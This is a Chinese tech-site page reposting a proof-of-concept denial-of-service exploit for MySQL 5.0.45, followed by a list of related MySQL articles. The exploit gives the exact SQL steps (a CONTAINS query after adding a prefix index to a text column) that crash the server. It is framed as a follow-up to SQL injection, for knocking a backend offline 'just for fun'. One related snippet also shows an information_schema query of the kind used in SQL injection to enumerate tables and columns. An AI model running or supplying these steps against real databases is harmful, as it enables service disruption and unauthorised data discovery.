mysql 5.0.45 (修改)拒绝服务漏洞

mysql 5.0.45 (修改)拒绝服务漏洞
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/

<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set

mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip>

(0)

相关推荐

  • 最新MySQL数据库漏洞情况通报

    近日,互联网上披露了关于MySQL数据库存在代码执行漏洞( CNNVD-201609-183 )的情况.由于MySQL数据库默认配置存在一定缺陷,导致攻击者可利用该漏洞对数据库配置文件进行篡改,进而以管理员权限执行任意代码,远程控制受影响服务器.目前,Oracle官方网站发布声明将于10月发布关键补丁更新信息. 一.漏洞简介 Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统. MySQL数据库中的配置文件(my.cnf)存在远程代码执行漏洞(漏洞编号:CNN

  • mysql5 注入漏洞

    复制代码 代码如下: select concat_ws(0x2f,information_schema.tables.table_schema,`information_schema`.`COLUMNS`.table_name,`information_schema`.`COLUMNS`.column_name) from `information_schema`.`COLUMNS` left join information_schema.tables on `information_sche

  • mysql 5.0.45 (修改)拒绝服务漏洞

    mysql 5.0.45 (修改)拒绝服务漏洞 /* * MySQL <=6.0 possibly affected * Kristian Erik Hermansen * Credit: Joe Gallo * You must have Alter permissions to exploit this bug! * Scenario: You found SQL injection, but you want to punch backend server * in the nuts ju

  • mysql5.7及mysql 8.0版本修改root密码的方法小结

    mysql5.7版本: 方法1: 用SET PASSWORD命令 格式:mysql> set password for 用户名@localhost = password('新密码'); 例子:mysql> set password for root@localhost = password('123'); mysql5.7和mysql8.0以上都可以用 方法2:用mysqladmin 格式:mysqladmin -u用户名 -p password 新密码 例子:mysqladmin -uroo

  • mysql 8.0.12 安装配置方法并修改密码

    本文记录了mysql 8.0.12 安装配置方法,供大家参考,具体内容如下 1.从官网下载MySQL for Windows:https://dev.mysql.com/downloads/mysql/ 2.安装在本机"D:mysql":解压zip文件后将解压得到的文件夹内的全部文件拷贝到D盘的mysql文件夹下即可. 3.创建mysql.ini文件,放在D:mysql文件下即可,文件内容为: [mysqld] # 设置3306端口 port=3306 # 设置mysql的安装目录 b

  • Windows10下mysql 8.0.19 winx64安装教程及修改初始密码

    本文为大家分享了mysql 8.0.19 winx64安装教程,供大家参考,具体内容如下 1. 下载mysql-8.0.19-winx64 1.1 进入地址:https://dev.mysql.com/downloads/mysql/ 1.2 解压zip包,并将解压文件 mysql-8.0.19-winx64 文件放在想放的位置,比如 D 盘下,如图: 1.3 配置环境变量(目的是为了避免在CMD窗口下操作时反复切换路径) 在Path下添加 D:\mysql-8.0.19-winx64\bin

  • mysql 8.0 安装配置方法教程

    一.安装mysql yum源 从官网http://dev.mysql.com/downloads/repo/yum/下载mysql最新的yum源的rpm安装包 wget http://repo.mysql.com//mysql57-community-release-el6-9.noarch.rpm 使用yum安装rpm包 yum install mysql57-community-release-el6-9.noarch.rpm 检测mysql yum源 yum repolist enable

  • 使用JDBC连接Mysql 8.0.11出现了各种错误的解决

    本想着自己安装数据库还是很熟悉了   没想到这次彻底被征服了 虽然以前装的都是Mysql 5.7 ,这次第一次安装Mysql 8.0.11,安装起来不费事,感觉还得心应手,但是   但是 就在用JDBC连接数据库和用jdbc.properties文件时出现了巨多的错误 ,一环扣一环,解决了一个 又生成一个 总结一下都有这些问题:(前提是在cmd下和可视化界面下正常使用) 1.检测连接引擎和数据库版本是否匹配 2.看了很多是要改密码  有两个属性很奇葩  some_user和user_host 一

  • mysql 8.0.13 安装配置方法图文教程

    本文为大家分享了mysql 8.0.13 安装配置教程,供大家参考,具体内容如下 下载 下载地址 解压 解压之后没有my.ini文件(我的端口设置的3308),截图中是我增加的 [client] port = 3308 default-character-set = utf8 [mysqld] port = 3308 character_set_server = utf8 basedir=D:\MySQL\mysql-8.0.13-winx64 datadir=D:\MySQL\mysql-8.

  • MySQL 5.7.16 修改密码提示 ERROR 1054 (42S22): Unknown column ''password'' in ''field list''的原因

    按照网上之前版本的操作,将my.ini中的skip-grant-tables注释去掉,然后在命令行中以mysql -u root -p可以直接进入,但是执行 mysql> update mysql.user set password=password('password') where user='root'; 会出现以下错误 mysql> ERROR 1054 (42S22): Unknown column 'password' in 'field list' 错误原因:mysql数据库下已

  • mac下安装mysql忘记密码的修改方法

    一.mac下安装MySQL数据库 1.下载MySQL数据库 下载地址:访问MySQL的官网http://www.mysql.com/downloads/ ,进行下载. 进入MySQL的下载界面(http://www.mysql.com/downloads/mysql/) 下载x86,64bit的dmg文件:直接选择最下面的"No thanks,just take me to downloads!" 2.安装MySQL数据库 打开MySQL安装包后,点击安装主程序pkg文件. 3.启动M

  • mysql 5.1版本修改密码及远程登录mysql数据库的方法

    mysql创建用户并授权: 格式:grant 权限 on 数据库名.表名 to 用户@登录主机 identified by "用户密码"; grant[英][grɑ:nt]   承认; 同意; 准许; 授予; 例1:允许mk用户从localhost登录 mysql> grant all on book.* to mk1@localhost identified by "123456"; #允许访问book数据库下的所有表, 只能访问book表,而且是同一个服务

随机推荐